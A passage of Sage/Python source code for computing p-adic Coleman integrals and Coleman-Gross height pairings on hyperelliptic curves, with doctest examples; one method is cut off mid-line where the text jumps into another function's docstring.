HK.invariant_differential()\n sage: x,y = HK.monsky_washnitzer_gens()\n sage: P = HK(1,0)\n sage: Q = HK(0,3)\n sage: S = HK.get_boundary_point(HJ,P)\n sage: P_to_S = HK.P_to_S(P,S)\n sage: S_to_Q = HJ.S_to_Q(S,Q)\n sage: P_to_S + S_to_Q\n (2*a^40 + a^80 + a^100 + O(a^105), a^20 + 2*a^40 + 4*a^60 + 2*a^80 + O(a^103))\n sage: HK.coleman_integrals_on_basis(P,Q)\n (2*5^2 + 5^4 + 5^5 + 3*5^6 + O(5^7), 5 + 2*5^2 + 4*5^3 + 2*5^4 + 5^6 + O(5^7))\n\n AUTHOR:\n\n - Jennifer Balakrishnan\n\n \"\"\"\n FS = self.frobenius(S)\n FS = (FS[0],FS[1])\n FQ = self.frobenius(Q)\n import sage.schemes.hyperelliptic_curves.monsky_washnitzer as monsky_washnitzer\n try:\n M_frob, forms = self._frob_calc\n except AttributeError:\n M_frob, forms = self._frob_calc = monsky_washnitzer.matrix_of_frobenius_hyperelliptic(self)\n try:\n HJ = self._curve_over_ram_extn\n K = HJ.base_ring()\n except AttributeError:\n HJ = S.scheme()\n K = self.base_ring()\n g = self.genus()\n prec2 = K.precision_cap()\n p = K.prime()\n dim = 2*g\n V = VectorSpace(K,dim)\n if S == FS:\n S_to_FS = V(dim*[0])\n else:\n P = self(ZZ(FS[0].expansion(0)),ZZ(FS[1].expansion(0)))\n x,y = self.local_coord(P,prec2)\n integrals = [(x**i*x.derivative()/(2*y)).integral() for i in range(dim)]\n S_to_FS = vector([I.polynomial()(FS[1]) - I.polynomial()(S[1]) for I in integrals])\n if HJ(Q[0],Q[1]) == HJ(FQ):\n FQ_to_Q = V(dim*[0])\n else:\n FQ_to_Q = V(self.tiny_integrals_on_basis(FQ, Q))\n try:\n L = [f(K(S[0]), K(S[1])) - f(K(Q[0]), K(Q[1])) for f in forms]\n except ValueError:\n forms = [f.change_ring(K) for f in forms]\n L = [f(S[0], S[1]) - f(Q[0], Q[1]) for f in forms]\n b = V(L)\n M_sys = matrix(K, M_frob).transpose() - 1\n B = (~M_sys)\n vv = min(c.valuation() for c in B.list())\n B = (p**(-vv)*B).change_ring(K)\n B = p**(vv)*B\n return B*(b-S_to_FS-FQ_to_Q)\n\n def coleman_integral_S_to_Q(self, w, S, Q):\n r\"\"\"\n Compute the Coleman integral `\\int_S^Q w`\n\n **one should be able to feed `S,Q` into coleman_integral,\n but currently that segfaults**\n\n INPUT:\n\n - w: a differential\n - S: a point with coordinates in an extension of `\\QQ_p`\n - Q: a non-Weierstrass point defined over `\\QQ_p`\n\n OUTPUT:\n\n the Coleman integral `\\int_S^Q w`\n\n EXAMPLES::\n\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x^3-10*x+9)\n sage: K = Qp(5,6)\n sage: HK = H.change_ring(K)\n sage: J. = K.extension(x^20-5)\n sage: HJ = H.change_ring(J)\n sage: x,y = HK.monsky_washnitzer_gens()\n sage: P = HK(1,0)\n sage: Q = HK(0,3)\n sage: S = HK.get_boundary_point(HJ,P)\n sage: P_to_S = HK.coleman_integral_P_to_S(y.diff(),P,S)\n sage: S_to_Q = HJ.coleman_integral_S_to_Q(y.diff(),S,Q)\n sage: P_to_S + S_to_Q\n 3 + O(a^119)\n sage: HK.coleman_integral(y.diff(),P,Q)\n 3 + O(5^6)\n\n AUTHOR:\n\n - Jennifer Balakrishnan\n \"\"\"\n import sage.schemes.hyperelliptic_curves.monsky_washnitzer as monsky_washnitzer\n K = self.base_ring()\n R = monsky_washnitzer.SpecialHyperellipticQuotientRing(self, K)\n MW = monsky_washnitzer.MonskyWashnitzerDifferentialRing(R)\n w = MW(w)\n f, vec = w.reduce_fast()\n g = self.genus()\n const = f(Q[0],Q[1])-f(S[0],S[1])\n if vec == vector(2*g*[0]):\n return const\n else:\n basis_values = self.S_to_Q(S, Q)\n dim = len(basis_values)\n dot = sum([vec[i] * basis_values[i] for i in range(dim)])\n return const + dot\n\n def coleman_integral_from_weierstrass_via_boundary(self, w, P, Q, d):\n r\"\"\"\n Computes the Coleman integral `\\int_P^Q w` via a boundary point\n in the disc of `P`, defined over a degree `d` extension\n\n INPUT:\n\n - w: a differential\n - P: a Weierstrass point\n - Q: a non-Weierstrass point\n - d: degree of extension where coordinates of boundary point lie\n\n OUTPUT:\n\n the Coleman integral `\\int_P^Q w`, written in terms of the uniformizer\n `a` of the degree `d` extension\n\n EXAMPLES::\n\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x^3-10*x+9)\n sage: K = Qp(5,6)\n sage: HK = H.change_ring(K)\n sage: P = HK(1,0)\n sage: Q = HK(0,3)\n sage: x,y = HK.monsky_washnitzer_gens()\n sage: HK.coleman_integral_from_weierstrass_via_boundary(y.diff(),P,Q,20)\n 3 + O(a^119)\n sage: HK.coleman_integral(y.diff(),P,Q)\n 3 + O(5^6)\n sage: w = HK.invariant_differential()\n sage: HK.coleman_integral_from_weierstrass_via_boundary(w,P,Q,20)\n 2*a^40 + a^80 + a^100 + O(a^105)\n sage: HK.coleman_integral(w,P,Q)\n 2*5^2 + 5^4 + 5^5 + 3*5^6 + O(5^7)\n\n AUTHOR:\n\n - Jennifer Balakrishnan\n \"\"\"\n HJ = self.curve_over_ram_extn(d)\n S = self.get_boundary_point(HJ, P)\n P_to_S = self.coleman_integral_P_to_S(w, P, S)\n S_to_Q = HJ.coleman_integral_S_to_Q(w, S, Q)\n return P_to_S + S_to_Q\n\n def init_height(self,divisor1,divisor2,prec=20,cggen=False):\n \"\"\"\n Initializes and caches certain quantities for p-adic local height computation\n AUTHOR:\n - Jennifer Balakrishnan\n \"\"\"\n import sage.schemes.hyperelliptic_curves.monsky_washnitzer as monsky_washnitzer\n g = self.genus()\n K = self.base_ring()\n p = K.prime()\n try:\n M_frob, forms = self._frob_calc\n except AttributeError:\n M_frob, forms = self._frob_calc = monsky_washnitzer.matrix_of_frobenius_hyperelliptic(self)\n A = matrix(K, M_frob).transpose() - 1\n m = max(a.valuation() for a in A.list())\n self._prec = max(m,prec)\n self._fwstrass = self.finite_weierstrass_points()\n self._div1 = divisor1\n self._div2 = divisor2\n self._cpm = self.cup_product_matrix()\n self._pth_roots = [self.find_pth_root_point(divisor1[i][1]) for i in range(2)]\n self._diff_log_div1 = self.differential_log(divisor1,prec)\n self._diff_log_div2 = self.differential_log(divisor2,prec)\n\n self._diff_log_hol_div1 = vector([self._diff_log_div1[i] for i in range(g)]+[0]*g)\n\n def eta_integral(self,divisor1,divisor2,prec=5):\n \"\"\"\n Coleman integral of eta, in the notation of Balakrishnan-Besser,\n ``Coleman-Gross height pairings and the p-adic sigma function,'' IMRN 2012\n AUTHOR:\n -- Jennifer Balakrishnan (2007-12)\n \"\"\"\n coeffs = self._diff_log_hol_div1\n g = self.genus()\n int = self.coleman_integrals_on_basis(divisor2[1][1],divisor2[0][1])\n return coeffs*int\n\n def sum_of_local_symbols(self, divisor, prec=20):\n \"\"\"\n For $w$ a differential with given residue divisor and $w_0,...,\n w_{2g-1}$ the basis of de Rham cohomology, computes\n $\\{\\sum_P _P\\}_{i=0,...,2g}$, where the sum is taken over all\n points $P$ in the divisor as well as all weierstrass points.\n NOTE: Assumes tha t divisor is of the form (P)-(Q)\n AUTHOR:\n -- Jennifer Balakrishnan (2007-12)\n \"\"\"\n x,y = self.monsky_washnitzer_gens()\n w = self.invariant_differential()\n g = self.genus()\n P = divisor[0][1]\n Q = divisor[1][1]\n local = vector([divisor[1][0]*self.coleman_integral(w*x**j,P,Q) for j in range(2*g)])\n return local\n\n def differential_log(self, divisor, prec=40):\n \"\"\"\n Given the hyperelliptic curve $C$, computes the\n log of a differential with given residue divisor\n lies in H^1_dR(C)\n This is Psi(w)\n if g = 1, W is spanned by x^(g+1) dx/y, ... x^(2g-1) dx/y\n else W is unit root subspace, given by Frob^n (x^g dx/y), ..., Frob^n (x^(2g-1) dx/y)\n EXAMPLES:\n sage: K = pAdicField(11,5)\n sage: R. = PolynomialRing(K)\n sage: C = HyperellipticCurve(x^5-23*x^3+18*x^2+40*x)\n sage: P = C(1,6)\n sage: Q = C(-2,12)\n sage: C.differential_log([(1,P),(-1,Q)])\n AUTHOR:\n - Jennifer Balakrishnan (2007-12)\n \"\"\"\n A = self._cpm\n v = self.sum_of_local_symbols(divisor,prec)\n g = self.genus()\n if v == vector([0]*2*g):\n return v\n import sage.schemes.hyperelliptic_curves.monsky_washnitzer as monsky_washnitzer\n try:\n M_frob, forms = self._frob_calc\n except AttributeError:\n M_frob, forms = self._frob_calc = monsky_washnitzer.matrix_of_frobenius_hyperelliptic(self)\n default_prec = self.base_ring().precision_cap()\n if g == 1:\n X = (M_frob**(default_prec)).matrix_from_columns([1]).transpose().list()\n else:\n X = (M_frob**(default_prec)).matrix_from_columns(range(g,2*g)).transpose().list()\n if g == 1:\n I = identity_matrix(2*g).matrix_from_columns([0]).transpose().list()\n else:\n I = identity_matrix(2*g).matrix_from_columns(range(g)).transpose().list()\n V = matrix(2*g,2*g, I + X).transpose()\n self._subspace = V\n return V**(-1)*(A**-1*v)\n\n def omega_integral(self,divisor1,divisor2,prec=20,cggen=False):\n \"\"\"\n Coleman integral of omega, in the notation of Balakrishnan-Besser,\n ``Coleman-Gross height pairings and the p-adic sigma function,'' IMRN 2012\n Updated to handle cases considered in Balakrishnan-Besser-Mueller,\n ``Computing integral points on hyperelliptic curves using quadratic Chabauty,'' Math Comp 2017\n AUTHOR:\n - Jennifer Balakrishnan\n \"\"\"\n p = self.base_ring().prime()\n P = divisor1[0][1]\n Q = divisor1[1][1]\n R = divisor2[0][1]\n S = divisor2[1][1]\n f = self.hyperelliptic_polynomials()[0]\n if self.is_same_disc(R,S):\n x,y,z= self.local_analytic_interpolation(S,R,5*prec)\n diff = self.diff(divisor1,x,y,True,False)\n int_diff = diff.integral()\n I = sum(int_diff.list())\n return I\n FR = self.frobenius(R)\n if R != FR:\n x,y,z = self.local_analytic_interpolation(R,FR,2*prec)\n if self.is_same_disc(R,P) == False and self.is_same_disc(R,Q) == False:\n R_to_FR = (self.diff(divisor1,x,y,tiny=True)).integral()\n R_to_FR = R_to_FR.truncate(R_to_FR.degree()+1)\n R_to_FR = R_to_FR(1)\n print(\"R_to_FR:\", R_to_FR)\n #this is the case of beta having residue divisor \"Q - wQ\" in the notation of our paper\n elif P[0] == Q[0] and P[1] == -Q[1]:\n #changing P to R, P' to FR, Q to P (in our paper)\n f = self.hyperelliptic_polynomials()[0]\n diffpart1 = (f(P[0]) - f(x))*x.derivative()/(y*(x - P[0])*(P[1] + y))\n intpart = (diffpart1.integral())\n intpart = intpart.truncate(intpart.degree()+1)\n intpart1 = intpart(1)\n R_to_FR = intpart1 +log(FR[0]-P[0],0) - log(R[0] - P[0],0)\n elif self.is_same_disc(R,P):\n f = self.hyperelliptic_polynomials()[0]\n diffpart1 = (f(P[0]) - f(x))*x.derivative()/(2*y*(x-P[0])*(P[1] + y))\n intpart = (diffpart1.integral())\n intpart = intpart.truncate(intpart.degree()+1)\n intpart1 = intpart(1)\n diffpart2 = x.derivative()/(2*y)*(y + Q[1])/(x - Q[0])\n intpart2 = diffpart2.integral().truncate(2*prec)(1)\n R_to_FR = intpart1 +log(FR[0]-P[0],0) - log(R[0] - P[0],0) - intpart2\n elif self.is_same_disc(R,Q):\n f = self.hyperelliptic_polynomials()[0]\n diffpart1 = (f(Q[0]) - f(x))*x.derivative()/(2*y*(x-Q[0])*(Q[1] + y))\n intpart = (diffpart1.integral())\n intpart = intpart.truncate(intpart.degree()+1)\n intpart1 = intpart(1)\n diffpart2 = x.derivative()/(2*y)*(y + P[1])/(x - P[0])\n intpart2 = diffpart2.integral().truncate(2*prec)(1)\n R_to_FR = intpart2 - (intpart1 +log(FR[0]-Q[0],0) - log(R[0] - Q[0],0))\n else:\n R_to_FR = 0\n FS = self.frobenius(S)\n if S !=FS:\n if self.is_same_disc(S,P) == False and self.is_same_disc(S,Q) == False:\n x,y,z = self.local_analytic_interpolation(FS,S,2*prec)\n FS_to_S = (self.diff(divisor1,x,y,tiny=True)).integral()\n FS_to_S = FS_to_S.truncate(FS_to_S.degree()+1)\n FS_to_S = FS_to_S(1)\n elif P[0] == Q[0] and P[1] == -Q[1] and S[0] == R[0] and S[1] == -R[1]:\n FS_to_S = R_to_FR\n else:\n print(S, FS, P, Q)\n else:\n FS_to_S = 0\n res = self.res(divisor1,divisor2,prec)\n ab = self.res_alpha_int_beta(divisor1, divisor2, prec,cggen)\n cups = self.psiA_cup_psiB(divisor1,divisor2,prec)\n return 1/(1-p)*(cups+res+ab-FS_to_S-R_to_FR)\n\n def res(self,divisor1,divisor2,prec=30, cggen=False):\n \"\"\"\n Returns sum(res(alpha*integral(beta))), where alpha and beta are\n in the notation of Balakrishnan-Besser,\n ``Coleman-Gross height pairings and the p-adic sigma function,'' IMRN 2012\n (need to sum over all of the right residue discs)\n alpha[0] is at P\n alpha[1] is at Q\n alpha[2] is at zeta_p x(P)^(1/p)\n alpha[3] is at zeta_p x(Q)^(1/p)\n alpha[4] is at finite weierstrass_1\n ...\n alpha[2g+4] is at finite weierstrass_{2g+1}\n alpha[2g+5] is at infinity\n AUTHOR:\n - Jennifer Balakrishnan\n \"\"\"\n from sage.schemes.hyperelliptic_curves.constructor import HyperellipticCurve\n K = self.base_ring()\n p = K.prime()\n A = self.alpha(divisor1,prec)\n div3 = self._pth_roots\n B = []\n r = self._fwstrass\n prec = self.base_ring().precision_cap()\n g = self.genus()\n for R in r:\n if R[0] !=0:\n x,y = self.local_coord(R,2*p*prec-p+2*g-1)\n B = B + [self.diff(divisor2,x,y)]\n dd= [f.degree() for f in B]\n Anew = []\n for i in range(len(A)):\n v = B[i].valuation()\n try:\n Anew = Anew + [A[i].truncate_neg(v-max(dd))]\n except AttributeError:\n Anew = [A[i]]\n ddd = [f.degree() for f in Anew]\n res = [Anew[i]*((B[i]).integral()) for i in range(len(Anew))]\n dddd = [f.degree() for f in res]\n res = [res[i].residue() for i in range(len(res))]\n S = K['x']\n f = S(self.hyperelliptic_polynomials()[0])\n degrees = [x[0].degree() for x in f.factor()]\n if len(r) == 2*g + 1:\n return sum(res)\n else: #here len(r) != 2*g+1 so we have to construct splitting fields\n if g > 6:\n raise NotImplementedError\n oldres = sum(res)\n f = self.hyperelliptic_polynomials()[0]\n if g == 1:\n if len(r) == 1:\n S = PowerSeriesRing(K, f.parent().variable_name(), default_prec=p+1)\n #S.set_default_prec(p+1)\n x = S.gen()\n oldprod = x - r[0][0]\n newg = (S(f)/S(oldprod)).truncate(p)\n J = K.extension(newg, names = 'b')\n elif len(r) == 0:\n J = K.extension(f,names= 'b')\n b = J.gen()\n EJ = self.change_ring(J)\n newr = self._newr = [EJ(b,0)]\n if g == 2:\n degrees = [x[0].degree() for x in f.factor()]\n if degrees == [5]:\n J = K.extension(f,names='b')\n b = J.gen()\n HJ = self.change_ring(J)\n newr = self._newr = [HJ(b,0)]\n elif (degrees == [1,4] or degrees == [1,1,3] or degrees == [1,1,1,3] or degrees == [1,1,1,2]):\n S = K[[f.parent().variable_name()]]\n x = S.gen()\n oldprod=1\n for i in range(len(r)):\n oldprod = oldprod*(x-r[i][0])\n J = K.extension((S(f)/S(oldprod)).polynomial(), names = 'b')\n b = J.gen()\n HJ = self.change_ring(J)\n newr = self._newr = [HJ(b,0)]\n elif degrees == [1,2,2]:\n pols = f.factor()\n J = K.extension(pols[1][0],names='b')\n b = J.gen()\n L = K.extension(pols[2][0],names='c')\n c = L.gen()\n newr = self._newr = [(b,0),(c,0)]\n elif degrees == [2,3]:\n pols = f.factor()\n J = K.extension(pols[0][0],names='b')\n b = J.gen()\n L = K.extension(pols[1][0],names='c')\n c = L.gen()\n newr = self._newr = [(b,0),(c,0)]\n if g == 3:\n rcount = len(r)\n pols = f.factor()\n if degrees == [7]:\n J = K.extension(f,names='b')\n b = J.gen()\n HJ = self.change_ring(J)\n newr = self._newr = [HJ(b,0)]\n elif (degrees == [1,6] or degrees == [1,1,5] or degrees == [1,1,1,4] or \\\n degrees == [1,1,1,1,3] or degrees == [1,1,1,1,1,2]):\n J = K.extension(pols[rcount][0],names='b')\n b = J.gen()\n HJ = self.change_ring(J)\n newr = self._newr = [HJ(b,0)]\n elif (degrees == [2,5] or degrees == [3,4] or degrees == [1,2,4] or \\\n degrees == [1,3,3] or degrees == [1,1,2,3] or degrees == [1,1,1,2,2]):\n J = K.extension(pols[rcount][0],names='b')\n b = J.gen()\n L = K.extension(pols[rcount+1][0],names='c')\n c = L.gen()\n newr = self._newr = [(b,0),(c,0)]\n elif (degrees == [2,2,3] or degrees == [1,2,2,2]):\n pols = f.factor()\n J = K.extension(pols[rcount][0],names='b')\n b = J.gen()\n L = K.extension(pols[rcount+1][0],names='c')\n c = L.gen()\n M = K.extension(pols[rcount+2][0],names='d')\n d = M.gen()\n newr = self._newr = [(b,0),(c,0),(d,0)]\n if g == 4:\n rcount = len(r)\n pols = f.factor()\n if degrees == [9]:\n J = K.extension(f,names='b')\n b = J.gen()\n HJ = self.change_ring(J)\n newr = self._newr = [HJ(b,0)]\n elif degrees in [[1,8], [1,1,7], [1,1,1,6], [1,1,1,1,5], [1,1,1,1,1,4],\\\n [1,1,1,1,1,1,3], [1,1,1,1,1,1,1,2]]:\n J = K.extension(pols[rcount][0],names='b')\n b = J.gen()\n HJ = self.change_ring(J)\n newr = self._newr = [HJ(b,0)]\n elif degrees in [[1,3,5], [3,6], [1,2,6], [1,1,2,5], [4,5], [2,7],\\\n [1,4,4], [1,1,3,4], [1,1,1,2,4], [1,1,1,1,2,3], [1,1,1,3,3],\\\n [1,1,1,1,1,2,2]]:\n J = K.extension(pols[rcount][0],names='b')\n b = J.gen()\n L = K.extension(pols[rcount+1][0],names='c')\n c = L.gen()\n newr = self._newr = [(b,0),(c,0)]\n elif degrees in [[2,3,4],[2,2,5],[3,3,3],[1,2,2,4],[1,2,3,3],[1,1,2,2,3],[1,1,1,2,2,2]]:\n pols = f.factor()\n J = K.extension(pols[rcount][0],names='b')\n b = J.gen()\n L = K.extension(pols[rcount+1][0],names='c')\n c = L.gen()\n M = K.extension(pols[rcount+2][0],names='d')\n d = M.gen()\n newr = self._newr = [(b,0),(c,0),(d,0)]\n elif degrees in [[1,2,2,2,2],[2,2,2,3]]:\n pols = f.factor()\n J = K.extension(pols[rcount][0],names='b')\n b = J.gen()\n L = K.extension(pols[rcount+1][0],names='c')\n c = L.gen()\n M = K.extension(pols[rcount+2][0],names='d')\n d = M.gen()\n N = K.extension(pols[rcount+3][0],names='e')\n e = N.gen()\n newr = self._newr = [(b,0),(c,0),(d,0),(e,0)]\n if g == 5:\n raise NotImplementedError\n if g == 6:\n rcount = len(r)\n pols = f.factor()\n if degrees == 8*[1] + [2,3]:\n J = K.extension(pols[rcount][0],names='b')\n b = J.gen()\n L = K.extension(pols[rcount+1][0],names='c')\n c = L.gen()\n newr = self._newr = [(b,0),(c,0)]\n else:\n raise NotImplementedError\n newres = []\n for R in newr:\n x,y = self.local_coord(R, 2*p*prec - p - 3 + 2*g - 1 + 5)\n newfrob = self.frob_diff_wstrass(divisor1, x, y, prec)\n newdiff = self.diff(divisor1, x, y)\n newbeta = self.diff(divisor2, x, y)\n newalpha = newfrob - p*newdiff\n #fixed indent below 8/27/19\n try:\n newres = newres + [(newalpha*newbeta.integral()).residue().trace()]\n except AttributeError:\n newres = newres + [(newalpha*newbeta.integral()).residue()]\n newres = sum(newres)\n return oldres + newres\n\n def alpha(self, divisor, prec=20,all=False):\n \"\"\"\n Returns alpha = phi^*w - p*w in the various local coordinates, where\n w has residue divisor (P)-(Q) and\n if all = True: P, Q, pth roots, then weierstrass\n else: just finite weierstrass\n #alpha[0] is at P\n #alpha[1] is at Q\n #alpha[2] is at zeta_p x(P)^(1/p)\n #alpha[3] is at zeta_p x(Q)^(1/p)\n have to re-index the following:\n alpha[4] is at finite weierstrass_1\n ...\n alpha[2g+4] is at finite weierstrass_{2g+1}\n alpha[2g+5] is at infnity\n So we have the following consistency checks (since res in each disc is supposed to be 0):\n (this also works when supp(divisor) is just in 1 disc)\n alpha[0].residue() + alpha[2].residue().trace() = 0\n alpha[1].residue() + alpha[3].residue().trace() = 0\n alpha[4].residue() = ... = alpha[2g+5].residue() = 0\n sage: R. = QQ['x']\n sage: K = Qp(7,6)\n sage: H = HyperellipticCurve(x*(x-1)*(x+9))\n sage: HK = H.change_ring(K)\n sage: P = HK(-1,4)\n sage: Q = HK(9,-36)\n sage: a = HK.alpha([(1,P),(-1,Q)])\n sage: (a[2]).residue().trace()+(a[0]).residue()\n O(7^5)\n sage: (a[3]).residue().trace()+(a[1]).residue()\n O(7^4)\n sage: [(a[i]).residue() for i in range(4,8)]\n [0, 0, 0, 0]\n AUTHOR:\n - Jennifer Balakrishnan\n \"\"\"\n g = self.genus()\n p = self.base_ring().prime()\n if all:\n D1 = [divisor[0][1],divisor[1][1]]\n D2 = self._pth_roots\n frob = []\n diff = []\n if all:\n for i in range(2):\n x,y = self.local_coord(D1[i],2*prec)\n frob = frob+ [self.frob_diff_nw(divisor,x,y,prec)]\n diff = diff + [self.diff(divisor,x,y)]\n for i in range(2):\n x,y = self.local_coord(D2[i],2*prec)\n frob = frob + [self.frob_diff_nw(divisor,x,y,prec)]\n diff = diff + [self.diff(divisor,x,y)]\n r = self._fwstrass\n for R in r:\n if R[0] != 0:\n x,y = self.local_coord(R,2*p*prec-p+2*g-1) #this seems to be the min for prec=5\n frob = frob + [self.frob_diff_wstrass(divisor,x,y,prec)]\n diff = diff + [self.diff(divisor,x,y)]\n alpha = [frob[i]-p*diff[i] for i in range(len(frob))]\n return alpha\n\n def find_pth_root_point(self,P,all=False):\n \"\"\"\n Given P=(a,b), finds a point P'=(a',b') over Qp(a^(1/p) such that\n a'^p = a\n if all=True, find all pth roots\n AUTHOR:\n - Jennifer Balakrishnan\n \"\"\"\n K = self.base_ring()\n p = K.prime()\n xP = P[0]\n\n g = self.hyperelliptic_polynomials()[0]\n ###working over the appropriate field\n R = QQ['x']\n x = R.gen()\n #replace self._sanity by P._sanity\n P._sanity = sanity = None\n if xP**p==xP:\n f = cyclotomic_polynomial(p,var='y')\n J = K.extension(f(x+1),names='a')\n else:\n try:\n\n J = K.extension((x+QQ(xP))**p-QQ(xP),names='a')\n except (NameError, ValueError, NotImplementedError):\n try:\n J = K.extension((x+xP)**p - (xP), names='a')\n except (NameError, NotImplementedError):\n try:\n rootshere = (x**p - xP).roots()\n except :\n gg = x**p - xP\n rootsmodp = GF(p)['x'](gg).roots()\n xi = ZZ(rootsmodp[0][0])\n for j in range(1,K.precision_cap()):\n for i in range(p):\n if gg(xi + i*p**j).valuation() == j+2:\n xi = xi + i*p**j\n break\n r = xi\n rootshere = [(r,1)]\n if len(rootshere) > 0:\n #S = K[['x']]\n #S.set_default_prec(p+1)\n S = PowerSeriesRing(K, 'x', default_prec=p+1)\n x = S.gen()\n newg = (S(x**p-xP)/(S(x-rootshere[0][0]))).truncate(p)\n for i in range(p):\n try:\n J = K.extension(newg(x+i), names='a')\n sanity = i\n #replace self._sanity and self._extrart by P._sanity and P._extrart\n P._sanity = sanity\n P._extrart = rootshere[0][0]\n except (NameError,ValueError,NotImplementedError):\n pass\n else:\n print(\"Sorry! Extension failed!\")\n a = J.gen()\n HJ = self.change_ring(J)\n\n #find the pth roots of x(P)\n if xP**p == xP:\n xPfracpow = (1+a)*xP\n elif sanity == None:\n xPfracpow = a+xP\n else:\n xPfracpow = a + sanity\n if g(xPfracpow)==0:\n return HJ(xPfracpow,0)\n yPfracpow = HJ.square_root_extension(g(xPfracpow))\n Pfracpow = HJ(xPfracpow,yPfracpow)\n P = HJ(P[0],P[1])\n if P[0]==Pfracpow[0] :\n xnew = (a+xP)*Pfracpow[0]\n ynew = HJ.square_root_extension(g(xnew))\n Pfracpow = HJ(xnew,ynew)\n if ((Pfracpow[1]).expansion()[0] == (P[1]).expansion()[0]):\n point = Pfracpow\n else:\n point = HJ(Pfracpow[0],-Pfracpow[1])\n if all == False:\n return point\n else:\n if xP**p != xP:\n print(\"Sorry, we can only print all of the roots when the extension is cyclotomic.\")\n return point\n else:\n pts = [point]\n xs = [(a+1)**i*(pts[0][0]) for i in range(1,p-1)]\n ys = [HJ.square_root_extension(g(x)) for x in xs]\n ynew = []\n for y in ys:\n if y.expansion()[0] != (P[1]).expansion()[0] :\n ynew = ynew + [-y]\n else:\n ynew = ynew + [y]\n pts = pts + [HJ(xs[i],ynew[i]) for i in range(len(xs))]\n return pts\n\n def square_root_extension(self,num):\n \"\"\"\n Takes a square root in a p-adic extension\n \"\"\"\n p = self.base_ring().prime()\n if num.valuation() == 0:\n c = num.expansion()[0]\n i = 1\n while i

    _A)_{i=0...2g-1}, where w is a differential form with residue divisor \"divisor\"\n if extension== True, creates the appropriate field extension and curve over that extension\n P is fixed point for all computations to link constants of integration\n Q is the residue disc where all the stuff should be happening\n TODO: merge with sum_of_local_symbols, make more modular\n \"\"\"\n p = self.base_ring().prime()\n if Q[1] == 0:\n wstrass = True\n else:\n wstrass = False\n if extension==True:\n A = self.find_pth_root_point(Q)\n else:\n A = Q\n g = self.hyperelliptic_polynomials()[0]\n gen = self.genus()\n\n ###working over the appropriate field\n cyc = False\n if extension==True:\n R = QQ['x']\n x = R.gen()\n if cyc==True:\n f = cyclotomic_polynomial(p)\n J = self.base_ring().extension(f(x+1),names='a')\n else:\n if Q[0]**p==Q[0]:\n f =((x+Q[0])**p-Q[0])\n d = f.degree()\n ff = sum(f.list()[i]*x**(i-1) for i in range(1,d+1))\n J = self.base_ring().extension(ff,names='a')\n else:\n J = self.base_ring().extension((x+Q[0])**p-Q[0],names='a')\n a = J.gen()\n H = self.change_ring(J)\n else:\n H = self\n\n x,y = H.local_coord(A,prec) #worry about prec later\n ###formal antiderivative of w_i\n try:\n I2 = vector(J,[0]*2*gen)\n except UnboundLocalError:\n R = QQ['x']\n x = R.gen()\n if cyc == True:\n f = cyclotomic_polynomial(p)\n J = self.base_ring().extension(f(x+1),names='a')\n else:\n if Q[0]**p==Q[0]:\n f =((x+Q[0])**p-Q[0])\n d = f.degree()\n ff = sum(f.list()[i]*x**(i-1) for i in range(1,d+1))\n J = self.base_ring().extension(ff,names='a')\n else:\n J = self.base_ring().extension((x+Q[0])**p-Q[0],names='a')\n I2 = vector(J,[0]*2*gen)\n extension = True\n ###if working over an extension, need tiny integral + coleman integral over Qp\n if extension == True:\n xx,yy = H.local_analytic_interpolation_cyclotomic(Q,A[0],prec) #this will change when it's weiestrass\n Q_to_A = [(xx.derivative()*xx**i/(2*yy)).integral() for i in range(2*gen)] #changed 1210 ##changed 03/04\n I = vector([f(1)-f(0) for f in Q_to_A]) #changed 1210\n\n P = H(P[0],P[1])\n ###plus a Coleman integral to offset the constant if P,A aren't in the same residue disc #this will change when it's weierstrass\n xm,ym = self.monsky_washnitzer_gens()\n omega = self.invariant_differential()\n\n if ((P[0]).expansion()[0] != (A[0]).expansion()[0] or (P[1]).expansion()[0] != (A[1]).expansion()[0]):\n I2= vector([self.coleman_integral(omega*xm**i,divisor[0][1],divisor[1][1]) for i in range(2*gen)])\n else:\n I = vector([self.coleman_integral(omega*xm**i,divisor[0][1],A) for i in range(2*gen)]) #weierstrass case\n w = self.frob_diff_nw(divisor,x,y,prec)\n v = [(w*(I[n]+I2[n])) for n in range(2*gen)]\n v = [f.residue_at_zero() for f in v]\n try:\n return vector([f.trace() for f in v])\n except AttributeError:\n return vector(self.base_ring(),v)\n\n\n def height(self,divisor1,divisor2,prec=None, cggen=False):\n \"\"\"\n The p-part of the Coleman-Gross height pairing of divisor1 and\n divisor2\n If self has ordinary reduction at self.base_ring().prime(), the height pairing\n is symmetric.\n GENUS 1 EXAMPLES\n sage: R. = QQ[]\n sage: H = HyperellipticCurve(x*(x-1)*(x+9))\n sage: K = Qp(7,10)\n sage: HK = H.change_ring(K)\n sage: P = HK(9,36)\n sage: Q = HK.teichmuller(P)\n sage: Pprime = HK(-4,10)\n sage: Qprime = HK.teichmuller(Pprime)\n sage: HK.height([(1,P),(-1,Q)],[(1,Pprime),(-1,Qprime)],10)\n 2*7^2 + 5*7^3 + 7^4 + 7^5 + 2*7^6 + 3*7^7 + 7^8 + 3*7^9 + O(7^10)\n sage: HK.height([(1,Pprime),(-1,Qprime)],[(1,P),(-1,Q)],10)\n 2*7^2 + 5*7^3 + 7^4 + 7^5 + 2*7^6 + 3*7^7 + 7^8 + 3*7^9 + O(7^10)\n sage: R. = QQ[]\n sage: H = HyperellipticCurve(x*(x-1)*(x+9))\n sage: K = Qp(7,10)\n sage: HK = H.change_ring(K)\n sage: P = HK(-1,4)\n sage: Q = HK(-1,-4)\n sage: R = HK(-4,-10)\n sage: S = HK(-4,10)\n sage: Pprime = HK(25/16,195/64)\n sage: Qprime = HK(25/16,-195/64)\n Test that h_7(P-Q, R-S) + h_7(P-Q, S-Pprime) = h_7(P-Q,R-Pprime)\n sage: HK.height([(1,P),(-1,Q)],[(1,R),(-1,S)],9)\n 6*7 + 5*7^2 + 2*7^3 + 4*7^4 + 7^5 + 3*7^6 + 7^7 + 4*7^9 + O(7^10)\n sage: HK.height([(1,P),(-1,Q)],[(1,S),(-1,Pprime)],9)\n 4*7 + 2*7^2 + 3*7^3 + 6*7^4 + 5*7^5 + 4*7^6 + 6*7^7 + 2*7^8 + 5*7^9 + O(7^10)\n sage: HK.height([(1,P),(-1,Q)],[(1,R),(-1,Pprime)],9)\n 3*7 + 7^2 + 6*7^3 + 3*7^4 + 7^6 + 7^7 + 3*7^8 + 2*7^9 + O(7^10)\n sage: 6*7 + 5*7^2 + 2*7^3 + 4*7^4 + 7^5 + 3*7^6 + O(7^7)+4*7 